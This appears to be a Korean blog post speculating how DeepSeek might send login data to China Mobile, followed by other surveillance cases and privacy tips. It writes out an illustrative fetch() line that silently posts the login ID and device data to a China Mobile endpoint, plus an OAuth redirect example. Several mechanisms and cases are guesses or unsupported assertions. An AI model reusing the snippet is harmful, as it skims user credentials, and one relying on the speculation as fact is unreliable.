📢 딥시크 로그인 정보 유출 논란! 어떻게 가능할까?

안녕하세요.
최근 중국 AI 서비스 딥시크(DeepSeek) 가 사용자 로그인 정보를
차이나모바일(China Mobile)로 전송하고 있다는 사실이 밝혀졌어요! 😨
이게 도대체 어떻게 가능할까요? 비슷한 사례들도 함께 알아볼게요. 🚨

---

🔍 1. 딥시크의 로그인 정보 전송, 어떻게 이루어질까?

✅ 1) 로그인할 때 사용자 정보를 가로채는 방식

로그인할 때 입력한 아이디(ID)나 기기 정보가 딥시크 서버로 가는 게 아니라,
몰래 차이나모바일 서버에도 전송될 가능성이 커요.
이걸 가능하게 하는 방법은 여러 가지가 있어요!

💡 방법 1: 웹페이지에 숨겨진 요청 (Hidden API Call)

 

fetch("https://api.chinamobile.com/track", { method: "POST", headers: { "Content-Type": "application/json" }, body: JSON.stringify({ username: document.getElementById("login_id").value, device_info: navigator.userAgent, ip_address: "사용자 IP 자동 감지", timestamp: new Date().toISOString() }) });

🧐 사용자가 로그인할 때, 백그라운드에서 몰래 데이터를 전송하는 코드예요!

💡 방법 2: 로그인 세션을 공유 (OAuth Hijacking)
딥시크에서 로그인하면 자동으로 차이나모바일 계정과 연동되는 시스템이 있을 수도 있어요.
예를 들어, 로그인 과정에서 이런 URL이 포함될 수도 있어요.

https://login.deepseek.com/oauth?redirect_uri=https://auth.chinamobile.com/callback

즉, 로그인하자마자 차이나모바일이 사용자 정보를 가져갈 수 있는 거죠! 😨

💡 방법 3: 디바이스 정보 수집 (브라우저 핑거프린팅)

• 어떤 기기에서 로그인하는지 자동으로 감지!
• IP 주소, 브라우저 버전, 화면 크기 등 개인 기기 고유 정보를 수집해 추적할 수도 있어요.

console.log(navigator.userAgent); // 사용 중인 브라우저 정보 console.log(screen.width + "x" + screen.height); // 화면 크기 정보

---

🕵️‍♂️ 2. 이런 사례, 다른 나라에서도 있었다?!

사실, 딥시크 같은 사례는 과거에도 여러 번 있었습니다! 😱

🟠 📲 중국: WeChat & QQ 감시 논란

• 중국 메신저 WeChat과 QQ도 유사한 기법으로 사용자 데이터를 몰래 수집한 적이 있어요.
• 채팅 내용을 분석해 특정 키워드(천안문, 홍콩 독립 등)를 감지하면 메시지 삭제 또는 감시! 👀
• 위치 정보, 디바이스 정보, SIM 카드 데이터까지 수집해서 중국 정부와 공유!

🟣 📱 TikTok의 데이터 전송 논란

• TikTok도 사용자 정보가 중국 서버로 전송된다는 의혹이 여러 번 제기됐어요!
• 앱을 닫아도 사용자의 위치 정보, 네트워크 정보를 지속적으로 수집한다는 점이 문제였죠.
• 결국 미국, 인도 등 일부 국가에서는 사용 금지 조치까지 나왔어요. 🚫

🔵 🖥️ 러시아: Yandex 브라우저의 데이터 유출

• 러시아의 유명 브라우저 Yandex는 사용자의 검색 기록과 로그인 정보를 자동으로 러시아 서버에 저장했던 적이 있어요.
• 특히, VPN을 사용해도 고유 기기 정보를 추적할 수 있는 UID 추적 기술을 적용해서 논란이 됐죠!

🔴 📝 북한: 키보드 앱을 이용한 정보 탈취

• 북한이 만든 Magic Keyboard라는 앱이 있었는데, 단순 키보드 앱처럼 보이지만 사용자의 모든 입력 내용을 감시하는 기능이 있었어요.
• 즉, 비밀번호, 이메일, 채팅 내용까지 실시간으로 유출될 수 있는 위험한 앱이었죠.

🟢 🖥️ 이란: "정부 브라우저"의 감시 기능

• 이란에서는 VPN을 막기 위해 특별한 브라우저를 배포했어요.
• 이 브라우저를 사용하면, 모든 로그인 정보(페이스북, 구글 계정 등)가 정부 서버로 자동 전송되었어요!

---

🚨 3. 우리 정보, 어떻게 지킬 수 있을까?

이런 문제를 막기 위해서 우리가 할 수 있는 방법도 있어요! 👍

🛑 1) 네트워크 트래픽 감시 (Wireshark, Burp Suite 사용)
👉🏻 로그인할 때 내 데이터가 어디로 가는지 확인 가능!

🔒 2) JavaScript 차단 (NoScript, uBlock Origin 확장 프로그램 사용)
👉🏻 딥시크 같은 사이트에서 추가적인 데이터 전송 차단 가능!

🛡 3) VPN & Tor 브라우저 사용
👉🏻 내 실제 IP를 숨겨서 내 활동이 감시되지 않도록 보호!

🤥 4) 가짜 정보 사용
👉🏻 계정 생성할 때 실제 정보 입력하지 않기! (예: 가짜 이메일, 임시 전화번호 사용)

---

❗ 결론: 딥시크를 믿어도 될까?

딥시크의 로그인 정보 유출 논란은 단순한 개인정보 문제가 아니라,
국가 감시 시스템과 연계될 가능성이 있는 심각한 사안이에요. 😨
과거에도 WeChat, TikTok, Yandex 등 여러 플랫폼에서 비슷한 방식으로 사용자 정보를 빼돌린 사례가 있었어요.

💡 우리가 할 수 있는 일?
✅ 데이터를 보호하는 방법을 배우고,
✅ 의심스러운 서비스는 신중하게 이용하는 것이 중요합니다! 🙌

📢 이런 정보, 친구들과도 공유해서 같이 조심해요! 🔥